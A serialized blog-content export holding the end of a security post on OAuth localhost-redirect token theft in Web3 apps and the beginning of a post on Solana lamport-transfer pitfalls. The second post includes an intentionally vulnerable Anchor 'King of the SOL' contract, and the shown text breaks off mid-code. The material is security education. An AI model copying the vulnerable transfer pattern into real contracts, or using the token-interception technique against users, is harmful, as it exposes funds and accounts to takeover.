}\n",{"type":27,"tag":207,"props":78283,"children":78284},{"class":209,"line":8029},[78285],{"type":27,"tag":207,"props":78286,"children":78287},{"style":238},[78288],{"type":33,"value":78211},{"type":27,"tag":207,"props":78290,"children":78291},{"class":209,"line":8037},[78292],{"type":27,"tag":207,"props":78293,"children":78294},{"style":238},[78295],{"type":33,"value":78296}," }\n",{"type":27,"tag":207,"props":78298,"children":78299},{"class":209,"line":8046},[78300],{"type":27,"tag":207,"props":78301,"children":78302},{"style":238},[78303],{"type":33,"value":78304}," }\n",{"type":27,"tag":207,"props":78306,"children":78307},{"class":209,"line":8055},[78308],{"type":27,"tag":207,"props":78309,"children":78310},{"style":238},[78311],{"type":33,"value":66118},{"type":27,"tag":207,"props":78313,"children":78314},{"class":209,"line":8064},[78315,78320,78324,78329,78333,78337],{"type":27,"tag":207,"props":78316,"children":78317},{"style":238},[78318],{"type":33,"value":78319}," }.",{"type":27,"tag":207,"props":78321,"children":78322},{"style":1335},[78323],{"type":33,"value":946},{"type":27,"tag":207,"props":78325,"children":78326},{"style":238},[78327],{"type":33,"value":78328},"(wait ",{"type":27,"tag":207,"props":78330,"children":78331},{"style":226},[78332],{"type":33,"value":10380},{"type":27,"tag":207,"props":78334,"children":78335},{"style":214},[78336],{"type":33,"value":19746},{"type":27,"tag":207,"props":78338,"children":78339},{"style":238},[78340],{"type":33,"value":10449},{"type":27,"tag":207,"props":78342,"children":78343},{"class":209,"line":8072},[78344],{"type":27,"tag":207,"props":78345,"children":78346},{"style":238},[78347],{"type":33,"value":10645},{"type":27,"tag":207,"props":78349,"children":78350},{"class":209,"line":8081},[78351],{"type":27,"tag":207,"props":78352,"children":78353},{"style":238},[78354],{"type":33,"value":451},{"type":27,"tag":36,"props":78356,"children":78357},{},[78358],{"type":33,"value":78359},"The code essentially creates a localhost web server and redirects the user to the OAuth authorization screen, which can be automatically bypassed under certain conditionswithout any user interaction. Once the authorization process is completed, the OAuth flow redirects the user back to the localhost server, including the secret authorization token in the query string.",{"type":27,"tag":36,"props":78361,"children":78362},{},[78363],{"type":33,"value":78364},"Since the attacker controls the localhost server, they can intercept and extract the token, enabling them to take over the victim's account.",{"type":27,"tag":58,"props":78366,"children":78368},{"id":78367},"mitigation-1",[78369],{"type":33,"value":47581},{"type":27,"tag":36,"props":78371,"children":78372},{},[78373,78375,78380],{"type":33,"value":78374},"As a mitigation measure, it is crucial to ensure that localhost servers are not whitelisted in the OAuth ",{"type":27,"tag":84,"props":78376,"children":78378},{"className":78377},[],[78379],{"type":33,"value":76999},{"type":33,"value":78381}," parameter. If whitelisting localhost is necessary due to specific business requirements, a custom solution must be carefully designed and implemented to safeguard the account security of all users.",{"type":27,"tag":28,"props":78383,"children":78384},{"id":10112},[78385],{"type":33,"value":10115},{"type":27,"tag":36,"props":78387,"children":78388},{},[78389],{"type":33,"value":78390},"In this article, we explored three lesser-known classes of vulnerabilities present in Web2 authentication flows utilized by Web3 dApps, shedding light on critical but often overlooked security risks. Authentication processes are inherently complex, and this complexity leaves room for vulnerabilities to persist unnoticed in applications.",{"type":27,"tag":36,"props":78392,"children":78393},{},[78394],{"type":33,"value":78395},"By uncovering and analyzing these vulnerabilities, we aim to stress the necessity of adopting a robust, holistic approach to authentication security. As Web3 continues to evolve, bridging the gap between traditional Web2 frameworks and the decentralized Web3 ecosystem is not just an opportunity but an imperative to safeguard users and their data.",{"type":27,"tag":10127,"props":78397,"children":78398},{},[78399],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":78401},[78402,78409,78414,78417],{"id":76767,"depth":244,"text":76770,"children":78403},[78404,78405,78406,78407,78408],{"id":76778,"depth":270,"text":76781},{"id":76805,"depth":270,"text":76808},{"id":76866,"depth":270,"text":76869},{"id":76923,"depth":270,"text":76926},{"id":77022,"depth":270,"text":77025},{"id":77068,"depth":244,"text":77071,"children":78410},[78411,78412,78413],{"id":77074,"depth":270,"text":77077},{"id":77101,"depth":270,"text":77104},{"id":47578,"depth":270,"text":47581},{"id":77550,"depth":244,"text":77553,"children":78415},[78416],{"id":78367,"depth":270,"text":47581},{"id":10112,"depth":244,"text":10115},"content:blog:2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3",{"_path":78422,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":78423,"description":78424,"author":47697,"image":78425,"date":78427,"isFeatured":19,"tags":78428,"onBlogPage":19,"body":78429,"_type":10152,"_id":83082,"_source":10154,"_file":83083,"_stem":83084,"_extension":10157},"/blog/2025-05-14-king-of-the-sol","Solana: The hidden dangers of lamport transfers","Solana’s lamport transfer logic hides dangerous edge cases — from rent-exemption quirks to write-demotion traps. We dissect a deceptively simple smart contract game to expose how transfers to arbitrary accounts can silently fail, brick your program, or crown an eternal king.",{"src":78426,"height":18,"width":18},"/posts/king-of-the-sol/king-of-the-sol.png","2025-05-14",[10169],{"type":24,"children":78430,"toc":83071},[78431,78435,78440,78454,78460,78465,78495,78500,78505,79542,79547,79555,79560,79566,79572,79584,79617,79629,79642,79654,80099,80104,80150,80156,80161,80248,80253,80267,80280,80943,80948,80960,80966,80977,80989,81143,81157,81176,81197,81203,81208,81553,81558,81564,81583,81597,82219,82224,82244,82249,82254,82260,82272,82293,82468,82474,82479,82780,82801,82813,82825,82909,82929,82941,82947,82959,82965,82970,82993,83005,83011,83023,83028,83034,83039,83044,83062,83067],{"type":27,"tag":28,"props":78432,"children":78433},{"id":30},[78434],{"type":33,"value":34},{"type":27,"tag":36,"props":78436,"children":78437},{},[78438],{"type":33,"value":78439},"Is it safe to transfer lamports to an arbitrary address on Solana? The answer might surprise you.",{"type":27,"tag":36,"props":78441,"children":78442},{},[78443,78445,78452],{"type":33,"value":78444},"In this post, we explore a deceptively simple smart contract game inspired by ",{"type":27,"tag":47,"props":78446,"children":78449},{"href":78447,"rel":78448},"https://www.kingoftheether.com/thrones/kingoftheether/index.html",[51],[78450],{"type":33,"value":78451},"King of the Ether",{"type":33,"value":78453},". Through it, we’ll highlight subtle pitfalls in Solana’s account model that can brick your program — especially when it comes to transferring lamports.",{"type":27,"tag":28,"props":78455,"children":78457},{"id":78456},"the-game-king-of-the-sol",[78458],{"type":33,"value":78459},"The Game: King of the SOL",{"type":27,"tag":36,"props":78461,"children":78462},{},[78463],{"type":33,"value":78464},"The game works like this:",{"type":27,"tag":1228,"props":78466,"children":78467},{},[78468,78480,78485,78490],{"type":27,"tag":1232,"props":78469,"children":78470},{},[78471,78473,78478],{"type":33,"value":78472},"Anyone can become the ",{"type":27,"tag":12606,"props":78474,"children":78475},{},[78476],{"type":33,"value":78477},"king",{"type":33,"value":78479}," by bidding at least 2× the previous bid.",{"type":27,"tag":1232,"props":78481,"children":78482},{},[78483],{"type":33,"value":78484},"The old king is reimbursed 95% of their bid.",{"type":27,"tag":1232,"props":78486,"children":78487},{},[78488],{"type":33,"value":78489},"The remaining 5% goes into a prize pot.",{"type":27,"tag":1232,"props":78491,"children":78492},{},[78493],{"type":33,"value":78494},"If the reigning king survives for 10 days without being dethroned, they can claim the entire pot.",{"type":27,"tag":36,"props":78496,"children":78497},{},[78498],{"type":33,"value":78499},"Simple, right?",{"type":27,"tag":36,"props":78501,"children":78502},{},[78503],{"type":33,"value":78504},"This is the core logic:",{"type":27,"tag":101,"props":78506,"children":78508},{"className":10270,"code":78507,"language":10269,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n #[account(mut)]\n pub throne: Account\u003C'info, Throne>,\n\n /// CHECK: old_king gets a 95% refund, so ensure its writable.\n #[account(mut, constraint = old_king.key() == throne.king)]\n pub old_king: AccountInfo\u003C'info>,\n\n /// CHECK: any writable account is allowed as a new king.\n #[account(mut)]\n pub new_king: AccountInfo\u003C'info>,\n\n #[account(mut)]\n pub payer: Signer\u003C'info>,\n}\n\n#[program]\npub mod king_of_the_sol {\n pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n // Check that bid_amount is at least 2x last_bid_amount\n assert!(bid_amount >= ctx.accounts.throne.last_bid_amount * 2);\n transfer_from_signer(\n &ctx.accounts.payer,\n &ctx.accounts.throne.to_account_info(),\n bid_amount,\n )?;\n\n // Reimburse 95% of the last bid to the old king\n let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n transfer_from_pda(\n &ctx.accounts.throne.to_account_info(),\n &ctx.accounts.old_king,\n to_reimburse,\n )?;\n\n // Set new king\n ctx.accounts.throne.king = ctx.accounts.new_king.key();\n ctx.accounts.throne.last_bid_amount = bid_amount;\n ctx.accounts.throne.last_time = Clock::get()?.unix_timestamp as u64;\n\n Ok(())\n }\n}\n",[78509],{"type":27,"tag":84,"props":78510,"children":78511},{"__ignoreMap":7},[78512,78527,78555,78570,78611,78618,78626,78677,78708,78715,78723,78738,78770,78777,78792,78823,78830,78837,78845,78861,78935,78943,79004,79016,79044,79084,79096,79112,79119,79127,79201,79213,79252,79280,79292,79307,79314,79322,79392,79436,79510,79517,79528,79535],{"type":27,"tag":207,"props":78513,"children":78514},{"class":209,"line":210},[78515,78519,78523],{"type":27,"tag":207,"props":78516,"children":78517},{"style":238},[78518],{"type":33,"value":30110},{"type":27,"tag":207,"props":78520,"children":78521},{"style":8920},[78522],{"type":33,"value":30115},{"type":27,"tag":207,"props":78524,"children":78525},{"style":238},[78526],{"type":33,"value":27530},{"type":27,"tag":207,"props":78528,"children":78529},{"class":209,"line":244},[78530,78534,78538,78543,78547,78551],{"type":27,"tag":207,"props":78531,"children":78532},{"style":214},[78533],{"type":33,"value":20967},{"type":27,"tag":207,"props":78535,"children":78536},{"style":214},[78537],{"type":33,"value":28423},{"type":27,"tag":207,"props":78539,"children":78540},{"style":8920},[78541],{"type":33,"value":78542}," ChangeKing",{"type":27,"tag":207,"props":78544,"children":78545},{"style":238},[78546],{"type":33,"value":30195},{"type":27,"tag":207,"props":78548,"children":78549},{"style":8920},[78550],{"type":33,"value":30200},{"type":27,"tag":207,"props":78552,"children":78553},{"style":238},[78554],{"type":33,"value":14563},{"type":27,"tag":207,"props":78556,"children":78557},{"class":209,"line":270},[78558,78562,78566],{"type":27,"tag":207,"props":78559,"children":78560},{"style":238},[78561],{"type":33,"value":30402},{"type":27,"tag":207,"props":78563,"children":78564},{"style":214},[78565],{"type":33,"value":11009},{"type":27,"tag":207,"props":78567,"children":78568},{"style":238},[78569],{"type":33,"value":27530},{"type":27,"tag":207,"props":78571,"children":78572},{"class":209,"line":296},[78573,78577,78582,78586,78590,78594,78598,78602,78607],{"type":27,"tag":207,"props":78574,"children":78575},{"style":214},[78576],{"type":33,"value":28115},{"type":27,"tag":207,"props":78578,"children":78579},{"style":220},[78580],{"type":33,"value":78581}," throne",{"type":27,"tag":207,"props":78583,"children":78584},{"style":226},[78585],{"type":33,"value":736},{"type":27,"tag":207,"props":78587,"children":78588},{"style":8920},[78589],{"type":33,"value":30367},{"type":27,"tag":207,"props":78591,"children":78592},{"style":238},[78593],{"type":33,"value":30195},{"type":27,"tag":207,"props":78595,"children":78596},{"style":8920},[78597],{"type":33,"value":30200},{"type":27,"tag":207,"props":78599,"children":78600},{"style":238},[78601],{"type":33,"value":1123},{"type":27,"tag":207,"props":78603,"children":78604},{"style":8920},[78605],{"type":33,"value":78606},"Throne",{"type":27,"tag":207,"props":78608,"children":78609},{"style":238},[78610],{"type":33,"value":13420},{"type":27,"tag":207,"props":78612,"children":78613},{"class":209,"line":445},[78614],{"type":27,"tag":207,"props":78615,"children":78616},{"emptyLinePlaceholder":19},[78617],{"type":33,"value":2062},{"type":27,"tag":207,"props":78619,"children":78620},{"class":209,"line":867},[78621],{"type":27,"tag":207,"props":78622,"children":78623},{"style":4647},[78624],{"type":33,"value":78625}," /// CHECK: old_king gets a 95% refund, so ensure its writable.\n",{"type":27,"tag":207,"props":78627,"children":78628},{"class":209,"line":892},[78629,78633,78637,78642,78646,78651,78655,78660,78664,78668,78672],{"type":27,"tag":207,"props":78630,"children":78631},{"style":238},[78632],{"type":33,"value":30402},{"type":27,"tag":207,"props":78634,"children":78635},{"style":214},[78636],{"type":33,"value":11009},{"type":27,"tag":207,"props":78638,"children":78639},{"style":238},[78640],{"type":33,"value":78641},", constraint ",{"type":27,"tag":207,"props":78643,"children":78644},{"style":226},[78645],{"type":33,"value":10380},{"type":27,"tag":207,"props":78647,"children":78648},{"style":238},[78649],{"type":33,"value":78650}," old_king",{"type":27,"tag":207,"props":78652,"children":78653},{"style":226},[78654],{"type":33,"value":1041},{"type":27,"tag":207,"props":78656,"children":78657},{"style":238},[78658],{"type":33,"value":78659},"key() ",{"type":27,"tag":207,"props":78661,"children":78662},{"style":226},[78663],{"type":33,"value":15856},{"type":27,"tag":207,"props":78665,"children":78666},{"style":238},[78667],{"type":33,"value":78581},{"type":27,"tag":207,"props":78669,"children":78670},{"style":226},[78671],{"type":33,"value":1041},{"type":27,"tag":207,"props":78673,"children":78674},{"style":238},[78675],{"type":33,"value":78676},"king)]\n",{"type":27,"tag":207,"props":78678,"children":78679},{"class":209,"line":1475},[78680,78684,78688,78692,78696,78700,78704],{"type":27,"tag":207,"props":78681,"children":78682},{"style":214},[78683],{"type":33,"value":28115},{"type":27,"tag":207,"props":78685,"children":78686},{"style":220},[78687],{"type":33,"value":78650},{"type":27,"tag":207,"props":78689,"children":78690},{"style":226},[78691],{"type":33,"value":736},{"type":27,"tag":207,"props":78693,"children":78694},{"style":8920},[78695],{"type":33,"value":32663},{"type":27,"tag":207,"props":78697,"children":78698},{"style":238},[78699],{"type":33,"value":30195},{"type":27,"tag":207,"props":78701,"children":78702},{"style":8920},[78703],{"type":33,"value":30200},{"type":27,"tag":207,"props":78705,"children":78706},{"style":238},[78707],{"type":33,"value":13420},{"type":27,"tag":207,"props":78709,"children":78710},{"class":209,"line":2065},[78711],{"type":27,"tag":207,"props":78712,"children":78713},{"emptyLinePlaceholder":19},[78714],{"type":33,"value":2062},{"type":27,"tag":207,"props":78716,"children":78717},{"class":209,"line":2092},[78718],{"type":27,"tag":207,"props":78719,"children":78720},{"style":4647},[78721],{"type":33,"value":78722}," /// CHECK: any writable account is allowed as a new king.\n",{"type":27,"tag":207,"props":78724,"children":78725},{"class":209,"line":2130},[78726,78730,78734],{"type":27,"tag":207,"props":78727,"children":78728},{"style":238},[78729],{"type":33,"value":30402},{"type":27,"tag":207,"props":78731,"children":78732},{"style":214},[78733],{"type":33,"value":11009},{"type":27,"tag":207,"props":78735,"children":78736},{"style":238},[78737],{"type":33,"value":27530},{"type":27,"tag":207,"props":78739,"children":78740},{"class":209,"line":2168},[78741,78745,78750,78754,78758,78762,78766],{"type":27,"tag":207,"props":78742,"children":78743},{"style":214},[78744],{"type":33,"value":28115},{"type":27,"tag":207,"props":78746,"children":78747},{"style":220},[78748],{"type":33,"value":78749}," new_king",{"type":27,"tag":207,"props":78751,"children":78752},{"style":226},[78753],{"type":33,"value":736},{"type":27,"tag":207,"props":78755,"children":78756},{"style":8920},[78757],{"type":33,"value":32663},{"type":27,"tag":207,"props":78759,"children":78760},{"style":238},[78761],{"type":33,"value":30195},{"type":27,"tag":207,"props":78763,"children":78764},{"style":8920},[78765],{"type":33,"value":30200},{"type":27,"tag":207,"props":78767,"children":78768},{"style":238},[78769],{"type":33,"value":13420},{"type":27,"tag":207,"props":78771,"children":78772},{"class":209,"line":4095},[78773],{"type":27,"tag":207,"props":78774,"children":78775},{"emptyLinePlaceholder":19},[78776],{"type":33,"value":2062},{"type":27,"tag":207,"props":78778,"children":78779},{"class":209,"line":4103},[78780,78784,78788],{"type":27,"tag":207,"props":78781,"children":78782},{"style":238},[78783],{"type":33,"value":30402},{"type":27,"tag":207,"props":78785,"children":78786},{"style":214},[78787],{"type":33,"value":11009},{"type":27,"tag":207,"props":78789,"children":78790},{"style":238},[78791],{"type":33,"value":27530},{"type":27,"tag":207,"props":78793,"children":78794},{"class":209,"line":4154},[78795,78799,78803,78807,78811,78815,78819],{"type":27,"tag":207,"props":78796,"children":78797},{"style":214},[78798],{"type":33,"value":28115},{"type":27,"tag":207,"props":78800,"children":78801},{"style":220},[78802],{"type":33,"value":49486},{"type":27,"tag":207,"props":78804,"children":78805},{"style":226},[78806],{"type":33,"value":736},{"type":27,"tag":207,"props":78808,"children":78809},{"style":8920},[78810],{"type":33,"value":30431},{"type":27,"tag":207,"props":78812,"children":78813},{"style":238},[78814],{"type":33,"value":30195},{"type":27,"tag":207,"props":78816,"children":78817},{"style":8920},[78818],{"type":33,"value":30200},{"type":27,"tag":207,"props":78820,"children":78821},{"style":238},[78822],{"type":33,"value":13420},{"type":27,"tag":207,"props":78824,"children":78825},{"class":209,"line":4203},[78826],{"type":27,"tag":207,"props":78827,"children":78828},{"style":238},[78829],{"type":33,"value":451},{"type":27,"tag":207,"props":78831,"children":78832},{"class":209,"line":4249},[78833],{"type":27,"tag":207,"props":78834,"children":78835},{"emptyLinePlaceholder":19},[78836],{"type":33,"value":2062},{"type":27,"tag":207,"props":78838,"children":78839},{"class":209,"line":4290},[78840],{"type":27,"tag":207,"props":78841,"children":78842},{"style":238},[78843],{"type":33,"value":78844},"#[program]\n",{"type":27,"tag":207,"props":78846,"children":78847},{"class":209,"line":4304},[78848,78852,78856],{"type":27,"tag":207,"props":78849,"children":78850},{"style":214},[78851],{"type":33,"value":20967},{"type":27,"tag":207,"props":78853,"children":78854},{"style":214},[78855],{"type":33,"value":1931},{"type":27,"tag":207,"props":78857,"children":78858},{"style":238},[78859],{"type":33,"value":78860}," king_of_the_sol {\n",{"type":27,"tag":207,"props":78862,"children":78863},{"class":209,"line":5466},[78864,78868,78872,78877,78881,78885,78889,78893,78897,78902,78906,78911,78915,78919,78923,78927,78931],{"type":27,"tag":207,"props":78865,"children":78866},{"style":214},[78867],{"type":33,"value":28115},{"type":27,"tag":207,"props":78869,"children":78870},{"style":214},[78871],{"type":33,"value":20972},{"type":27,"tag":207,"props":78873,"children":78874},{"style":1335},[78875],{"type":33,"value":78876}," change_king",{"type":27,"tag":207,"props":78878,"children":78879},{"style":238},[78880],{"type":33,"value":1343},{"type":27,"tag":207,"props":78882,"children":78883},{"style":220},[78884],{"type":33,"value":27552},{"type":27,"tag":207,"props":78886,"children":78887},{"style":226},[78888],{"type":33,"value":736},{"type":27,"tag":207,"props":78890,"children":78891},{"style":8920},[78892],{"type":33,"value":27561},{"type":27,"tag":207,"props":78894,"children":78895},{"style":238},[78896],{"type":33,"value":9257},{"type":27,"tag":207,"props":78898,"children":78899},{"style":8920},[78900],{"type":33,"value":78901},"ChangeKing",{"type":27,"tag":207,"props":78903,"children":78904},{"style":238},[78905],{"type":33,"value":13912},{"type":27,"tag":207,"props":78907,"children":78908},{"style":220},[78909],{"type":33,"value":78910},"bid_amount",{"type":27,"tag":207,"props":78912,"children":78913},{"style":226},[78914],{"type":33,"value":736},{"type":27,"tag":207,"props":78916,"children":78917},{"style":8920},[78918],{"type":33,"value":13142},{"type":27,"tag":207,"props":78920,"children":78921},{"style":238},[78922],{"type":33,"value":2222},{"type":27,"tag":207,"props":78924,"children":78925},{"style":226},[78926],{"type":33,"value":8968},{"type":27,"tag":207,"props":78928,"children":78929},{"style":8920},[78930],{"type":33,"value":21038},{"type":27,"tag":207,"props":78932,"children":78933},{"style":238},[78934],{"type":33,"value":27603},{"type":27,"tag":207,"props":78936,"children":78937},{"class":209,"line":5530},[78938],{"type":27,"tag":207,"props":78939,"children":78940},{"style":4647},[78941],{"type":33,"value":78942}," // Check that bid_amount is at least 2x last_bid_amount\n",{"type":27,"tag":207,"props":78944,"children":78945},{"class":209,"line":7900},[78946,78950,78954,78958,78962,78966,78970,78974,78978,78983,78987,78992,78996,79000],{"type":27,"tag":207,"props":78947,"children":78948},{"style":1335},[78949],{"type":33,"value":71680},{"type":27,"tag":207,"props":78951,"children":78952},{"style":238},[78953],{"type":33,"value":1343},{"type":27,"tag":207,"props":78955,"children":78956},{"style":220},[78957],{"type":33,"value":78910},{"type":27,"tag":207,"props":78959,"children":78960},{"style":226},[78961],{"type":33,"value":15583},{"type":27,"tag":207,"props":78963,"children":78964},{"style":220},[78965],{"type":33,"value":33108},{"type":27,"tag":207,"props":78967,"children":78968},{"style":226},[78969],{"type":33,"value":1041},{"type":27,"tag":207,"props":78971,"children":78972},{"style":238},[78973],{"type":33,"value":21951},{"type":27,"tag":207,"props":78975,"children":78976},{"style":226},[78977],{"type":33,"value":1041},{"type":27,"tag":207,"props":78979,"children":78980},{"style":238},[78981],{"type":33,"value":78982},"throne",{"type":27,"tag":207,"props":78984,"children":78985},{"style":226},[78986],{"type":33,"value":1041},{"type":27,"tag":207,"props":78988,"children":78989},{"style":238},[78990],{"type":33,"value":78991},"last_bid_amount ",{"type":27,"tag":207,"props":78993,"children":78994},{"style":226},[78995],{"type":33,"value":9286},{"type":27,"tag":207,"props":78997,"children":78998},{"style":232},[78999],{"type":33,"value":438},{"type":27,"tag":207,"props":79001,"children":79002},{"style":238},[79003],{"type":33,"value":1455},{"type":27,"tag":207,"props":79005,"children":79006},{"class":209,"line":7909},[79007,79012],{"type":27,"tag":207,"props":79008,"children":79009},{"style":1335},[79010],{"type":33,"value":79011}," transfer_from_signer",{"type":27,"tag":207,"props":79013,"children":79014},{"style":238},[79015],{"type":33,"value":9090},{"type":27,"tag":207,"props":79017,"children":79018},{"class":209,"line":7917},[79019,79023,79027,79031,79035,79039],{"type":27,"tag":207,"props":79020,"children":79021},{"style":226},[79022],{"type":33,"value":14967},{"type":27,"tag":207,"props":79024,"children":79025},{"style":220},[79026],{"type":33,"value":27552},{"type":27,"tag":207,"props":79028,"children":79029},{"style":226},[79030],{"type":33,"value":1041},{"type":27,"tag":207,"props":79032,"children":79033},{"style":238},[79034],{"type":33,"value":21951},{"type":27,"tag":207,"props":79036,"children":79037},{"style":226},[79038],{"type":33,"value":1041},{"type":27,"tag":207,"props":79040,"children":79041},{"style":238},[79042],{"type":33,"value":79043},"payer,\n",{"type":27,"tag":207,"props":79045,"children":79046},{"class":209,"line":7926},[79047,79051,79055,79059,79063,79067,79071,79075,79080],{"type":27,"tag":207,"props":79048,"children":79049},{"style":226},[79050],{"type":33,"value":14967},{"type":27,"tag":207,"props":79052,"children":79053},{"style":220},[79054],{"type":33,"value":27552},{"type":27,"tag":207,"props":79056,"children":79057},{"style":226},[79058],{"type":33,"value":1041},{"type":27,"tag":207,"props":79060,"children":79061},{"style":238},[79062],{"type":33,"value":21951},{"type":27,"tag":207,"props":79064,"children":79065},{"style":226},[79066],{"type":33,"value":1041},{"type":27,"tag":207,"props":79068,"children":79069},{"style":238},[79070],{"type":33,"value":78982},{"type":27,"tag":207,"props":79072,"children":79073},{"style":226},[79074],{"type":33,"value":1041},{"type":27,"tag":207,"props":79076,"children":79077},{"style":1335},[79078],{"type":33,"value":79079},"to_account_info",{"type":27,"tag":207,"props":79081,"children":79082},{"style":238},[79083],{"type":33,"value":10778},{"type":27,"tag":207,"props":79085,"children":79086},{"class":209,"line":7934},[79087,79092],{"type":27,"tag":207,"props":79088,"children":79089},{"style":220},[79090],{"type":33,"value":79091}," bid_amount",{"type":27,"tag":207,"props":79093,"children":79094},{"style":238},[79095],{"type":33,"value":1842},{"type":27,"tag":207,"props":79097,"children":79098},{"class":209,"line":7943},[79099,79104,79108],{"type":27,"tag":207,"props":79100,"children":79101},{"style":238},[79102],{"type":33,"value":79103}," )",{"type":27,"tag":207,"props":79105,"children":79106},{"style":226},[79107],{"type":33,"value":10444},{"type":27,"tag":207,"props":79109,"children":79110},{"style":238},[79111],{"type":33,"value":241},{"type":27,"tag":207,"props":79113,"children":79114},{"class":209,"line":7952},[79115],{"type":27,"tag":207,"props":79116,"children":79117},{"emptyLinePlaceholder":19},[79118],{"type":33,"value":2062},{"type":27,"tag":207,"props":79120,"children":79121},{"class":209,"line":7961},[79122],{"type":27,"tag":207,"props":79123,"children":79124},{"style":4647},[79125],{"type":33,"value":79126}," // Reimburse 95% of the last bid to the old king\n",{"type":27,"tag":207,"props":79128,"children":79129},{"class":209,"line":7969},[79130,79134,79139,79143,79147,79151,79155,79159,79163,79167,79171,79175,79179,79184,79188,79192,79197],{"type":27,"tag":207,"props":79131,"children":79132},{"style":214},[79133],{"type":33,"value":10353},{"type":27,"tag":207,"props":79135,"children":79136},{"style":220},[79137],{"type":33,"value":79138}," to_reimburse",{"type":27,"tag":207,"props":79140,"children":79141},{"style":226},[79142],{"type":33,"value":229},{"type":27,"tag":207,"props":79144,"children":79145},{"style":238},[79146],{"type":33,"value":686},{"type":27,"tag":207,"props":79148,"children":79149},{"style":220},[79150],{"type":33,"value":27552},{"type":27,"tag":207,"props":79152,"children":79153},{"style":226},[79154],{"type":33,"value":1041},{"type":27,"tag":207,"props":79156,"children":79157},{"style":238},[79158],{"type":33,"value":21951},{"type":27,"tag":207,"props":79160,"children":79161},{"style":226},[79162],{"type":33,"value":1041},{"type":27,"tag":207,"props":79164,"children":79165},{"style":238},[79166],{"type":33,"value":78982},{"type":27,"tag":207,"props":79168,"children":79169},{"style":226},[79170],{"type":33,"value":1041},{"type":27,"tag":207,"props":79172,"children":79173},{"style":238},[79174],{"type":33,"value":78991},{"type":27,"tag":207,"props":79176,"children":79177},{"style":226},[79178],{"type":33,"value":9286},{"type":27,"tag":207,"props":79180,"children":79181},{"style":232},[79182],{"type":33,"value":79183}," 9500",{"type":27,"tag":207,"props":79185,"children":79186},{"style":238},[79187],{"type":33,"value":2222},{"type":27,"tag":207,"props":79189,"children":79190},{"style":226},[79191],{"type":33,"value":980},{"type":27,"tag":207,"props":79193,"children":79194},{"style":232},[79195],{"type":33,"value":79196}," 10000",{"type":27,"tag":207,"props":79198,"children":79199},{"style":238},[79200],{"type":33,"value":241},{"type":27,"tag":207,"props":79202,"children":79203},{"class":209,"line":7978},[79204,79209],{"type":27,"tag":207,"props":79205,"children":79206},{"style":1335},[79207],{"type":33,"value":79208}," transfer_from_pda",{"type":27,"tag":207,"props":79210,"children":79211},{"style":238},[79212],{"type":33,"value":9090},{"type":27,"tag":207,"props":79214,"children":79215},{"class":209,"line":7987},[79216,79220,79224,79228,79232,79236,79240,79244,79248],{"type":27,"tag":207,"props":79217,"children":79218},{"style":226},[79219],{"type":33,"value":14967},{"type":27,"tag":207,"props":79221,"children":79222},{"style":220},[79223],{"type":33,"value":27552},{"type":27,"tag":207,"props":79225,"children":79226},{"style":226},[79227],{"type":33,"value":1041},{"type":27,"tag":207,"props":79229,"children":79230},{"style":238},[79231],{"type":33,"value":21951},{"type":27,"tag":207,"props":79233,"children":79234},{"style":226},[79235],{"type":33,"value":1041},{"type":27,"tag":207,"props":79237,"children":79238},{"style":238},[79239],{"type":33,"value":78982},{"type":27,"tag":207,"props":79241,"children":79242},{"style":226},[79243],{"type":33,"value":1041},{"type":27,"tag":207,"props":79245,"children":79246},{"style":1335},[79247],{"type":33,"value":79079},{"type":27,"tag":207,"props":79249,"children":79250},{"style":238},[79251],{"type":33,"value":10778},{"type":27,"tag":207,"props":79253,"children":79254},{"class":209,"line":7996},[79255,79259,79263,79267,79271,79275],{"type":27,"tag":207,"props":79256,"children":79257},{"style":226},[79258],{"type":33,"value":14967},{"type":27,"tag":207,"props":79260,"children":79261},{"style":220},[79262],{"type":33,"value":27552},{"type":27,"tag":207,"props":79264,"children":79265},{"style":226},[79266],{"type":33,"value":1041},{"type":27,"tag":207,"props":79268,"children":79269},{"style":238},[79270],{"type":33,"value":21951},{"type":27,"tag":207,"props":79272,"children":79273},{"style":226},[79274],{"type":33,"value":1041},{"type":27,"tag":207,"props":79276,"children":79277},{"style":238},[79278],{"type":33,"value":79279},"old_king,\n",{"type":27,"tag":207,"props":79281,"children":79282},{"class":209,"line":8005},[79283,79288],{"type":27,"tag":207,"props":79284,"children":79285},{"style":220},[79286],{"type":33,"value":79287}," to_reimburse",{"type":27,"tag":207,"props":79289,"children":79290},{"style":238},[79291],{"type":33,"value":1842},{"type":27,"tag":207,"props":79293,"children":79294},{"class":209,"line":8013},[79295,79299,79303],{"type":27,"tag":207,"props":79296,"children":79297},{"style":238},[79298],{"type":33,"value":79103},{"type":27,"tag":207,"props":79300,"children":79301},{"style":226},[79302],{"type":33,"value":10444},{"type":27,"tag":207,"props":79304,"children":79305},{"style":238},[79306],{"type":33,"value":241},{"type":27,"tag":207,"props":79308,"children":79309},{"class":209,"line":8021},[79310],{"type":27,"tag":207,"props":79311,"children":79312},{"emptyLinePlaceholder":19},[79313],{"type":33,"value":2062},{"type":27,"tag":207,"props":79315,"children":79316},{"class":209,"line":8029},[79317],{"type":27,"tag":207,"props":79318,"children":79319},{"style":4647},[79320],{"type":33,"value":79321}," // Set new king\n",{"type":27,"tag":207,"props":79323,"children":79324},{"class":209,"line":8037},[79325,79329,79333,79337,79341,79345,79349,79354,79358,79362,79366,79370,79374,79379,79383,79388],{"type":27,"tag":207,"props":79326,"children":79327},{"style":220},[79328],{"type":33,"value":33451},{"type":27,"tag":207,"props":79330,"children":79331},{"style":226},[79332],{"type":33,"value":1041},{"type":27,"tag":207,"props":79334,"children":79335},{"style":238},[79336],{"type":33,"value":21951},{"type":27,"tag":207,"props":79338,"children":79339},{"style":226},[79340],{"type":33,"value":1041},{"type":27,"tag":207,"props":79342,"children":79343},{"style":238},[79344],{"type":33,"value":78982},{"type":27,"tag":207,"props":79346,"children":79347},{"style":226},[79348],{"type":33,"value":1041},{"type":27,"tag":207,"props":79350,"children":79351},{"style":238},[79352],{"type":33,"value":79353},"king 